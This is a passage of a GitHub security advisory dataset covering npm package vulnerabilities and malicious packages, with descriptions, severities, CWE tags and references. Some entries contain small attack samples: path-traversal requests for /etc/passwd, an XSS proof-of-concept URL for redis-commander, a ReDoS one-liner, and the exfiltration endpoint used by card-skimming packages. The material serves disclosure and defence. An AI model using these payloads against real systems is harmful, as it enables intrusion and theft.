{'https://github.com/dojo/dojox/commit/47d1b302b5b23d94e875b77b9b9a8c4f5622c9da', 'https://github.com/dojo/dojox/security/advisories/GHSA-3hw5-q855-g6cw', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5259', 'https://lists.debian.org/debian-lts-announce/2020/03/msg00012.html'}
null
npm
GHSA-p2hm-8725-c8x8
Downloads Resources over HTTP in cue-sdk-node
Affected versions of `cue-sdk-node` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `cue-sdk-node`. ## Recommendation No patch is currently available for this vulnerability. The best mitigation is currently to avoid using this package, using a different package if available. Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{'CVE-2016-10590'}
2021-01-08T18:24:35Z
2019-02-18T23:50:58Z
HIGH
null
{'CWE-311'}
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10590', 'https://github.com/advisories/GHSA-p2hm-8725-c8x8', 'https://nodesecurity.io/advisories/190', 'https://www.npmjs.com/advisories/190'}
null
npm
GHSA-hgr5-82rc-p936
Cross-Site Scripting in md-data-table
All versions of `md-data-table` are vulnerable to cross-site scripting (XSS). This vulnerability is exploitable if an attacker has control over data that is rendered by `mdt-row` ## Recommendation As there is no fix for this vulnerability at this time we recommend either selecting another package to perform this functionality or properly sanitizing all user data prior to rendering with `md-data-table`
null
2020-08-31T18:34:23Z
2020-09-01T21:24:41Z
HIGH
null
{'CWE-79'}
{'https://www.npmjs.com/advisories/748'}
null
npm
GHSA-4hpf-3wq7-5rpr
Regular expression deinal of service (ReDoS) in is-my-json-valid
It was discovered that the is-my-json-valid JavaScript library used an inefficient regular expression to validate JSON fields defined to have email format. A specially crafted JSON file could cause it to consume an excessive amount of CPU time when validated.
{'CVE-2018-1107'}
2021-04-23T20:09:28Z
2022-01-06T20:44:07Z
MODERATE
null
{'CWE-400'}
{'https://nvd.nist.gov/vuln/detail/CVE-2018-1107', 'https://github.com/mafintosh/is-my-json-valid/pull/159', 'https://github.com/mafintosh/is-my-json-valid/commit/b3051b277f7caa08cd2edc6f74f50aeda65d2976', 'https://bugzilla.redhat.com/show_bug.cgi?id=1546357', 'https://snyk.io/vuln/npm:is-my-json-valid:20180214'}
null
npm
GHSA-r8hx-3qx6-hxq9
Malicious Package in commandre
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-10-01T20:59:17Z
2020-09-03T19:41:14Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1387'}
null
npm
GHSA-qmv4-jgp7-mf68
Broken CORS in sails
Affected versions of `sails` have an issue with the CORS configuration where the value of the origin header is reflected as the value for the `Access-Control-Allow-Origin` header. This may allow an attacker to make AJAX requests to vulnerable hosts through cross-site scripting or a malicious HTML Document, effectively bypassing the Same Origin Policy. ## Mitigating Factors This is only an issue when `allRoutes` is set to `true` and `origin` is set to `*` or left commented out in the sails CORS config file. The problem can be compounded when the cors `credentials` setting is not provided, because at that point authenticated cross domain requests are possible. ## Recommendation Update to version 0.12.7 or later. As this vulnerability is primarily a user error, the patch for the vulnerability will simply cause the application to write an error message to the console when a vulnerable configuration is used in a production environment. Writing a proper CORS configuration is still the responsibility of the user, so it is necessary to check for the error message after installing the patch. Be sure you are not using `allRoutes: true` with `origin:'*'`, and that you uncomment `origin` and set it to a reasonable value. Ensure that if `origin` is set to `*` that you truly mean for all other websites to be able to make cross-domain requests to your API. Likewise, ensure `credentials` is uncommented out and set to the appropriate value. Make sure to explicitly set which origins may request resources via CORS.
{'CVE-2016-10549'}
2020-08-31T18:12:30Z
2019-02-18T23:40:10Z
HIGH
null
{'CWE-284'}
{'https://github.com/advisories/GHSA-qmv4-jgp7-mf68', 'https://nodesecurity.io/advisories/148', 'http://sailsjs.org/documentation/reference/configuration/sails-config-cors', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10549', 'http://sailsjs.org/documentation/concepts/security/cors', 'https://www.npmjs.com/advisories/148'}
null
npm
GHSA-pq5x-rprq-8jrj
Directory Traversal in exxxxxxxxxxx
Affected versions of `exxxxxxxxxxx` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. This vulnerability is only effective for files that have a file extension, which provides a partial mitigation. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16130'}
2020-08-31T18:24:41Z
2018-07-23T22:06:14Z
HIGH
null
{'CWE-22'}
{'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/exxxxxxxxxxx', 'https://github.com/advisories/GHSA-pq5x-rprq-8jrj', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16130', 'https://nodesecurity.io/advisories/478', 'https://www.npmjs.com/advisories/478'}
null
npm
GHSA-83pq-466j-fc6j
Prototype Pollution in sahmat
All versions of `sahmat ` are vulnerable to prototype pollution. The package does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects. ## Recommendation No fix is currently available. Consider using an alternative package until a fix is made available.
null
2020-08-31T18:55:34Z
2020-09-04T15:17:50Z
HIGH
null
{'CWE-1321'}
{'https://www.npmjs.com/advisories/1336'}
null
npm
GHSA-pjwm-rvh2-c87w
Embedded malware in ua-parser-js
The npm package `ua-parser-js` had three versions published with malicious code. Users of affected versions (0.7.29, 0.8.0, 1.0.0) should upgrade as soon as possible and check their systems for suspicious activity. See [this issue](https://github.com/faisalman/ua-parser-js/issues/536) for details as they unfold. Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-10-22T21:43:36Z
2021-10-22T20:38:14Z
CRITICAL
null
{'CWE-506'}
{'https://github.com/faisalman/ua-parser-js/issues/536', 'https://github.com/faisalman/ua-parser-js', 'https://github.com/faisalman/ua-parser-js/issues/536#issuecomment-949772496', 'https://www.npmjs.com/package/ua-parser-js'}
null
npm
GHSA-xm7f-x4wx-wmgv
Out-of-bounds Read in byte
Versions of `byte` before 1.4.1 allocate uninitialized buffers and read data from them past the initialized length ## Recommendation Update to version 1.4.1 or later.
null
2020-08-31T18:31:36Z
2019-06-04T15:47:43Z
MODERATE
null
{'CWE-125'}
{'https://www.npmjs.com/advisories/657', 'https://hackerone.com/reports/330351', 'https://github.com/node-modules/byte/pull/3'}
null
npm
GHSA-957j-59c2-j692
Prototype pollution vulnerability in 'getobject'
Prototype pollution vulnerability in 'getobject' version 0.1.0 allows an attacker to cause a denial of service and may lead to remote code execution.
{'CVE-2020-28282'}
2021-10-08T22:07:57Z
2021-10-12T16:26:37Z
CRITICAL
null
null
{'https://github.com/cowboy/node-getobject/blob/aba04a8e1d6180eb39eff09990c3a43886ba8937/lib/getobject.js#L48', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28282', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28282', 'https://github.com/cowboy/node-getobject'}
null
npm
GHSA-9fg5-f5pj-rwcc
Hijacked Environment Variables in gruntcli
The `gruntcli` package is a piece of malware that steals environment variables and sends them to attacker controlled locations. All versions have been unpublished from the npm registry. ## Recommendation As this package is malware, if you find it installed in your environment, the real security concern is determining how it got there. If you have found this installed in your environment, you should: 1. Delete the package 2. Clear your npm cache 3. Ensure it is not present in any other package.json files on your system 4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables. Additionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.
{'CVE-2017-16058'}
2020-08-31T18:25:27Z
2018-11-09T17:43:52Z
MODERATE
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/498', 'https://nodesecurity.io/advisories/498', 'https://github.com/advisories/GHSA-9fg5-f5pj-rwcc', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16058'}
null
npm
GHSA-v99v-xgjx-7m7g
Malicious Package in asnyc
All versions of `asnyc` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise. ## Recommendation Remove the package from your dependencies and always ensure package names are typed correctly upon installation.
null
2021-10-01T14:00:55Z
2020-09-02T18:40:47Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/847'}
null
npm
GHSA-8xj3-7258-w4q2
Directory Traversal in dasafio
Affected versions of `dasafio` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16179'}
2020-08-31T18:23:58Z
2020-09-01T18:51:22Z
MODERATE
null
{'CWE-22'}
{'https://www.npmjs.com/advisories/460', 'https://nodesecurity.io/advisories/460', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/dasafio', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16179'}
null
npm
GHSA-8c8c-4vfj-rrpc
Reflected Cross-Site Scripting in redis-commander
Affected versions of `redis-commander` contain a cross-site scripting vulnerability in the `highlighterId` paramter of the clipboard.swf component on hosts serving Redis Commander. Mitigating factors: Flash must be installed / enabled for this to work. The below proof of concept was verified to work using Firefox 57.0 on Windows 10 by manually installing the [Flash NPAPI Windows plugin](https://get.adobe.com/flashplayer/otherversions/) ## Proof of concept ``` http://instance/jstree/_docs/syntax/clipboard.swf?highlighterId=\%22))}%20catch(e)%20{alert(document.domain);}// ``` ## Recommendation No direct patch for this vulnerability is currently available. At this time, the best mitigation is to use an alternative, functionally equivalent package, or to use extreme caution when using redis-commander, ensuring that redis-commmander is the only web page you have open, and avoiding clicking on any links.
null
2022-03-04T22:02:50Z
2020-09-01T19:05:11Z
LOW
null
{'CWE-79'}
{'https://www.npmjs.com/advisories/562', 'https://github.com/joeferner/redis-commander', 'https://github.com/joeferner/redis-commander/commit/1a483ebb3a706cf199dd283cf0aead96606adb14', 'https://hackerone.com/reports/296377', 'https://github.com/joeferner/redis-commander/releases/tag/v0.5.0'}
null
npm
GHSA-4943-9vgg-gr5r
Cross-site Scripting in quill
A vulnerability in the HTML editor of Slab Quill allows an attacker to execute arbitrary JavaScript by storing an XSS payload (a crafted `onloadstart` attribute of an IMG element) in a text field. No patch exists and no further releases are planned. This CVE is disputed. Researchers have claimed that this issue is not within the product itself, but is intended behavior in a web browser. More information can be found [here](https://github.com/quilljs/quill/issues/3364).
{'CVE-2021-3163'}
2022-03-22T15:00:36Z
2021-05-10T15:38:12Z
MODERATE
null
{'CWE-79'}
{'https://github.com/quilljs/quill', 'https://quilljs.com', 'https://burninatorsec.blogspot.com/2021/04/cve-2021-3163-xss-slab-quill-js.html', 'https://github.com/quilljs/quill/issues/3364', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3163', 'https://github.com/quilljs/quill/issues/3273', 'https://github.com/quilljs/quill/issues/3359'}
null
npm
GHSA-j5qg-46p9-w2rp
Malicious Package in jekyll-for-github-projects
Version 0.2.12 of `jekyll-for-github-projects` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=` ## Recommendation Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
null
2020-08-31T18:41:08Z
2020-09-03T00:33:32Z
CRITICAL
null
null
{'https://www.npmjs.com/advisories/936'}
null
npm
GHSA-35g4-qx3c-vjhx
Automatic room upgrade handling can be used maliciously to bridge a room non-consentually
### Impact If a bridge has room upgrade handling turned on in the configuration (the `roomUpgradeOpts` key when instantiating a new `Bridge` instance.), any `m.room.tombstone` event it encounters will be used to unbridge the current room and bridge into the target room. However, the target room `m.room.create` event is not checked to verify if the `predecessor` field contains the previous room. This means that any mailcious admin of a bridged room can repoint the traffic to a different room without the new room being aware. ### Patches Versions 2.6.1 and greater are patched. ### Workarounds Disabling the automatic room upgrade handling can be done by removing the `roomUpgradeOpts` key from the `Bridge` class options. ### References The issue is patched by https://github.com/matrix-org/matrix-appservice-bridge/pull/330 ### For more information] If you have any questions or comments about this advisory, email us at security@matrix.org.
{'CVE-2021-32659'}
2021-06-16T20:08:37Z
2021-06-21T17:09:22Z
MODERATE
null
{'CWE-306'}
{'https://github.com/matrix-org/matrix-appservice-bridge/commit/b69e745584a34fcfd858df33e4631e420da07b9f', 'https://github.com/matrix-org/matrix-appservice-bridge/pull/330', 'https://github.com/matrix-org/matrix-appservice-bridge/security/advisories/GHSA-35g4-qx3c-vjhx', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32659', 'https://github.com/matrix-org/matrix-appservice-bridge/releases/tag/2.6.1'}
null
npm
GHSA-6vfc-qv3f-vr6c
Uncontrolled Resource Consumption in markdown-it
### Impact Special patterns with length > 50K chars can slow down parser significantly. ```js const md = require('markdown-it')(); md.render(`x ${' '.repeat(150000)} x \nx`); ``` ### Patches Upgrade to v12.3.2+ ### Workarounds No. ### References Fix + test sample: https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101
{'CVE-2022-21670'}
2022-01-19T18:25:52Z
2022-01-12T22:20:22Z
MODERATE
null
{'CWE-400'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-21670', 'https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101', 'https://github.com/markdown-it/markdown-it', 'https://github.com/markdown-it/markdown-it/security/advisories/GHSA-6vfc-qv3f-vr6c'}
null
npm
GHSA-j9xp-92vc-559j
SQL Injection in sequelize
Affected versions of `sequelize` are vulnerable to SQL Injection. The package fails to sanitize JSON path keys in the MariaDB and MySQL dialects, which may allow attackers to inject SQL statements and execute arbitrary SQL queries. ## Recommendation If you are using `sequelize` 5.x, upgrade to version 5.8.11 or later. If you are using `sequelize` 4.x, upgrade to version 4.44.3 or later. If you are using `sequelize` 3.x, upgrade to version 3.35.1 or later.
{'CVE-2019-10748'}
2021-08-18T22:09:33Z
2019-11-06T17:11:10Z
CRITICAL
null
{'CWE-89'}
{'https://snyk.io/vuln/SNYK-JS-SEQUELIZE-450221', 'https://github.com/sequelize/sequelize/commit/a72a3f5,', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10748', 'https://www.npmjs.com/advisories/1018', 'https://github.com/sequelize/sequelize/pull/11089,'}
null
npm
GHSA-45cp-hpc9-8347
Malicious Package in css_transform_support
Version 1.0.2 of `css_transform_support` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=` ## Recommendation If version 1.0.2 of this module is found installed you will want to replace it with a version before or after 1.0.2. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
null
2020-08-31T18:30:19Z
2020-09-01T19:52:35Z
CRITICAL
null
null
{'https://www.npmjs.com/advisories/624'}
null
npm
GHSA-g4hj-r7r3-9rwv
OS Command Injection in gulp-scss-lint
gulp-scss-lint through 1.0.0 allows execution of arbitrary commands. It is possible to inject arbitrary commands to the &quot;exec&quot; function located in &quot;src/command.js&quot; via the provided options.
{'CVE-2020-7601'}
2021-07-28T20:50:13Z
2021-05-07T16:15:37Z
CRITICAL
null
{'CWE-98'}
{'https://snyk.io/vuln/SNYK-JS-GULPSCSSLINT-560114', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7601'}
null
npm
GHSA-49r3-3h96-rwj6
Cross-Site Scripting in ids-enterprise
Versions of `ids-enterprise` prior to 4.18.2 are vulnerable to Cross-Site Scripting (XSS). The `soho-dropdown` component does not properly encode its output and may allow attackers to execute arbitrary JavaScript. ## Recommendation Upgrade to version 4.18.2 or later
null
2020-08-31T18:41:54Z
2019-06-13T19:09:31Z
HIGH
null
{'CWE-79'}
{'https://github.com/infor-design/enterprise-ng/issues/503', 'https://www.npmjs.com/advisories/956', 'https://github.com/infor-design/enterprise/commit/6bd74d8f38c268b22f31e8169316e065e0093362'}
null
npm
GHSA-2563-83p7-f34p
Malicious Package in requestt
All versions of `requestt` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise. ## Recommendation Remove the package from your dependencies and always ensure package names are typed correctly upon installation.
null
2021-10-01T14:04:11Z
2020-09-02T20:24:41Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/856'}
null
npm
GHSA-p65h-233c-jxvm
Downloads Resources over HTTP in resourcehacker
Affected versions of `resourcehacker` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `resourcehacker`. ## Recommendation No patch is currently available for this vulnerability. The best mitigation is currently to avoid using this package, using a different package if available. Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{'CVE-2016-10646'}
2021-01-08T18:23:55Z
2018-08-15T19:03:59Z
HIGH
null
{'CWE-311'}
{'https://www.npmjs.com/advisories/254', 'https://nodesecurity.io/advisories/254', 'https://github.com/advisories/GHSA-p65h-233c-jxvm', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10646', 'https://github.com/felicienfrancois/node-resourcehacker/blob/master/scripts/install.js#L4'}
null
npm
GHSA-gcm9-cc3r-c6vj
Cross-site Scripting (XSS) in Eclipse Theia
In Eclipse Theia versions up to and including 1.2.0, the Markdown Preview (@theia/preview), can be exploited to execute arbitrary code.
{'CVE-2020-27224'}
2021-03-29T22:10:04Z
2021-04-13T15:18:09Z
CRITICAL
null
{'CWE-79'}
{'https://github.com/eclipse-theia/theia/pull/7971', 'https://omespino.com/write-up-google-bug-bounty-xss-to-cloud-shell-instance-takeover-rce-as-root-5000-usd/', 'https://nvd.nist.gov/vuln/detail/CVE-2020-27224', 'https://github.com/eclipse-theia/theia/issues/7954'}
null
npm
GHSA-g7q5-pjjr-gqvp
Regular Expression Denial of Service in tough-cookie
Affected versions of `tough-cookie` are susceptible to a regular expression denial of service. The amplification on this vulnerability is relatively low - it takes around 2 seconds for the engine to execute on a malicious input which is 50,000 characters in length. If node was compiled using the `-DHTTP_MAX_HEADER_SIZE` however, the impact of the vulnerability can be significant, as the primary limitation for the vulnerability is the default max HTTP header length in node. ## Recommendation Update to version 2.3.3 or later.
{'CVE-2017-15010'}
2021-09-10T20:28:19Z
2018-07-24T20:14:39Z
HIGH
null
{'CWE-400'}
{'http://www.securityfocus.com/bid/101185', 'https://access.redhat.com/errata/RHSA-2018:1263', 'https://github.com/salesforce/tough-cookie', 'https://access.redhat.com/errata/RHSA-2017:2912', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6VEBDTGNHVM677SLZDEHMWOP3ISMZSFT/', 'https://www.npmjs.com/advisories/525', 'https://nvd.nist.gov/vuln/detail/CVE-2017-15010', 'https://access.redhat.com/errata/RHSA-2018:1264', 'https://access.redhat.com/errata/RHSA-2017:2913', 'https://github.com/advisories/GHSA-g7q5-pjjr-gqvp', 'https://github.com/salesforce/tough-cookie/issues/92', 'https://snyk.io/vuln/npm:tough-cookie:20170905', 'https://nodesecurity.io/advisories/525'}
null
npm
GHSA-5p28-63mc-cgr9
Cross-Site Scripting bypass in html-purify
All versions of html-purify are vulnerable to cross-site scripting. The data attribute inside of object tags is not properly sanitized and allows javascript URIs leading to code execution. No fix is currently available. Consider using an alternative package until a fix is made available.
null
2020-12-04T20:02:42Z
2020-12-04T20:04:37Z
HIGH
null
{'CWE-79'}
{'https://www.npmjs.com/advisories/1586'}
null
npm
GHSA-pwqj-h62h-q35c
Directory Traversal in goserv
Affected versions of `goserv` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16133'}
2020-08-31T18:24:28Z
2018-07-23T20:49:03Z
HIGH
null
{'CWE-22'}
{'https://nvd.nist.gov/vuln/detail/CVE-2017-16133', 'https://github.com/advisories/GHSA-pwqj-h62h-q35c', 'https://nodesecurity.io/advisories/473', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/goserv', 'https://www.npmjs.com/advisories/473'}
null
npm
GHSA-q8pj-2vqx-8ggc
Denial of service in css-what
The css-what package 4.0.0 through 5.0.0 for Node.js does not ensure that attribute parsing has Linear Time Complexity relative to the size of the input.
{'CVE-2021-33587'}
2021-12-02T17:48:49Z
2021-06-07T22:11:39Z
HIGH
null
{'CWE-400'}
{'https://github.com/fb55/css-what/releases/tag/v5.0.1', 'https://github.com/fb55/css-what/commit/4cdaacfd0d4b6fd00614be030da0dea6c2994655', 'https://nvd.nist.gov/vuln/detail/CVE-2021-33587', 'https://security.netapp.com/advisory/ntap-20210706-0007/', 'https://github.com/fb55/css-what'}
null
npm
GHSA-7pr3-p5fm-8r9x
LiveQuery publishes user session tokens in parse-server
### Impact For regular (non-LiveQuery) queries, the session token is removed from the response, but for LiveQuery payloads it is currently not. If a user has a LiveQuery subscription on the `Parse.User` class, all session tokens created during user sign-ups will be broadcast as part of the LiveQuery payload. ### Patches Remove session token from LiveQuery payload. ### Workaround Set `user.acl(new Parse.ACL())` in a beforeSave trigger to make the user private already on sign-up.
{'CVE-2021-41109'}
2021-09-30T16:43:12Z
2021-09-30T17:09:47Z
HIGH
null
{'CWE-200'}
{'https://github.com/parse-community/parse-server/releases/tag/4.10.4', 'https://github.com/parse-community/parse-server/commit/4ac4b7f71002ed4fbedbb901db1f6ed1e9ac5559', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41109', 'https://github.com/parse-community/parse-server', 'https://github.com/parse-community/parse-server/security/advisories/GHSA-7pr3-p5fm-8r9x'}
null
npm
GHSA-9r2w-394v-53qc
Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links
### Impact Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution `node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created. This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory, where the symlink and directory names in the archive entry used backslashes as a path separator on posix systems. The cache checking logic used both `\` and `/` characters as path separators, however `\` is a valid filename character on posix systems. By first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. Additionally, a similar confusion could arise on case-insensitive filesystems. If a tar archive contained a directory at `FOO`, followed by a symbolic link named `foo`, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the filesystem, but _not_ from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within the `FOO` directory would then be placed in the target of the symbolic link, thinking that the directory had already been created. These issues were addressed in releases 4.4.16, 5.0.8 and 6.1.7. The v3 branch of `node-tar` has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of `node-tar`. If this is not possible, a workaround is available below. ### Patches 4.4.16 || 5.0.8 || 6.1.7 ### Workarounds Users may work around this vulnerability without upgrading by creating a custom filter method which prevents the extraction of symbolic links. ```js const tar = require('tar') tar.x({ file: 'archive.tgz', filter: (file, entry) => { if (entry.type === 'SymbolicLink') { return false } else { return true } } }) ``` Users are encouraged to upgrade to the latest patched versions, rather than attempt to sanitize tar input themselves. ### Fix The problem is addressed in the following ways: 1. All paths are normalized to use `/` as a path separator, replacing `\` with `/` on Windows systems, and leaving `\` intact in the path on posix systems. This is performed in depth, at every level of the program where paths are consumed. 2. Directory cache pruning is performed case-insensitively. This _may_ result in undue cache misses on case-sensitive file systems, but the performance impact is negligible. #### Caveat Note that this means that the `entry` objects exposed in various parts of tar's API will now always use `/` as a path separator, even on Windows systems. This is not expected to cause problems, as `/` is a valid path separator on Windows systems, but _may_ result in issues if `entry.path` is compared against a path string coming from some other API such as `fs.realpath()` or `path.resolve()`. Users are encouraged to always normalize paths using a well-tested method such as `path.resolve()` before comparing paths to one another.
{'CVE-2021-37701'}
2021-08-31T16:01:50Z
2021-08-31T16:05:27Z
HIGH
null
{'CWE-59', 'CWE-22'}
{'https://www.npmjs.com/package/tar', 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-37701', 'https://www.debian.org/security/2021/dsa-5008', 'https://github.com/npm/node-tar/security/advisories/GHSA-9r2w-394v-53qc', 'https://github.com/npm/node-tar'}
null
npm
GHSA-g973-978j-2c3p
Denial of Service in SheetJS Pro
SheetJS Pro through 0.16.9 allows attackers to cause a denial of service (CPU consumption) via a crafted .xlsx document that is mishandled when read by xlsx.js.
{'CVE-2021-32014'}
2022-03-03T05:14:12.644117Z
2021-07-22T19:47:15Z
MODERATE
null
{'CWE-345', 'CWE-400'}
{'https://sheetjs.com/pro', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32014', 'https://floqast.com/engineering-blog/post/fuzzing-and-parsing-securely/', 'https://www.npmjs.com/package/xlsx/v/0.17.0', 'https://www.oracle.com/security-alerts/cpujan2022.html'}
null
npm
GHSA-g74r-ffvr-5q9f
Memory Exposure in concat-stream
Versions of `concat-stream` before 1.5.2 are vulnerable to memory exposure if userp provided input is passed into `write()` Versions <1.3.0 are not affected due to not using unguarded Buffer constructor. ## Recommendation Update to version 1.5.2, 1.4.11, 1.3.2 or later. If you are unable to update make sure user provided input into the `write()` function is not a number.
null
2020-08-31T18:29:17Z
2019-06-03T17:26:44Z
MODERATE
null
{'CWE-200'}
{'https://gist.github.com/ChALkeR/c2d2fd3f1d72d51ad883df195be03a85', 'https://nodesecurity.io/advisories/597', 'https://github.com/maxogden/concat-stream/pull/47', 'https://github.com/maxogden/concat-stream/pull/47/commits/3e285ba5e5b10b7c98552217f5c1023829efe69e', 'https://www.npmjs.com/advisories/597'}
null
npm
GHSA-qw96-mm2g-c8m7
Next.js has cross site scripting (XSS) vulnerability via the 404 or 500 /_error page
Next.js 7.0.0 and 7.0.1 has XSS via the 404 or 500 /_error page.
{'CVE-2018-18282'}
2022-04-26T18:43:28Z
2018-10-15T21:43:12Z
MODERATE
null
{'CWE-79'}
{'https://github.com/zeit/next.js', 'https://nvd.nist.gov/vuln/detail/CVE-2018-18282', 'https://github.com/zeit/next.js/releases/tag/7.0.2', 'https://github.com/advisories/GHSA-qw96-mm2g-c8m7'}
null
npm
GHSA-5fg8-2547-mr8q
Misinterpretation of malicious XML input
### Impact xmldom versions 0.6.0 and older do not correctly escape special characters when serializing elements removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications. ### Patches Update to one of the fixed versions of `@xmldom/xmldom` (`>=0.7.0`) See issue #271 for the status of publishing `xmldom` to npm or join #270 for Q&A/discussion until it's resolved. ### Workarounds Downstream applications can validate the input and reject the maliciously crafted documents. ### References Similar to this one reported on the Go standard library: - https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/ - https://mattermost.com/blog/securing-xml-implementations-across-the-web/ ### For more information If you have any questions or comments about this advisory: * Open an issue in [`xmldom/xmldom`](https://github.com/xmldom/xmldom) * Email us: send an email to **all** addresses that are shown by `npm owner ls @xmldom/xmldom`
{'CVE-2021-32796'}
2022-01-04T19:36:30Z
2021-08-03T16:57:05Z
MODERATE
null
{'CWE-116'}
{'https://www.npmjs.com/package/@xmldom/xmldom', 'https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32796', 'https://github.com/xmldom/xmldom/security/advisories/GHSA-5fg8-2547-mr8q', 'https://github.com/xmldom/xmldom', 'https://mattermost.com/blog/securing-xml-implementations-across-the-web/', 'https://github.com/xmldom/xmldom/commit/7b4b743917a892d407356e055b296dcd6d107e8b'}
null
npm
GHSA-f9cm-p3w6-xvr3
Denial-of-Service Extended Event Loop Blocking in qs
Versions prior to 1.0.0 of `qs` are affected by a denial of service vulnerability that results from excessive recursion in parsing a deeply nested JSON string. ## Recommendation Update to version 1.0.0 or later
{'CVE-2014-10064'}
2020-08-31T18:08:25Z
2018-10-09T00:38:48Z
HIGH
null
{'CWE-400'}
{'https://nvd.nist.gov/vuln/detail/CVE-2014-10064', 'https://github.com/advisories/GHSA-f9cm-p3w6-xvr3', 'https://www.npmjs.com/advisories/28', 'https://nodesecurity.io/advisories/28'}
null
npm
GHSA-fq6p-x6j3-cmmq
Denial of service in three
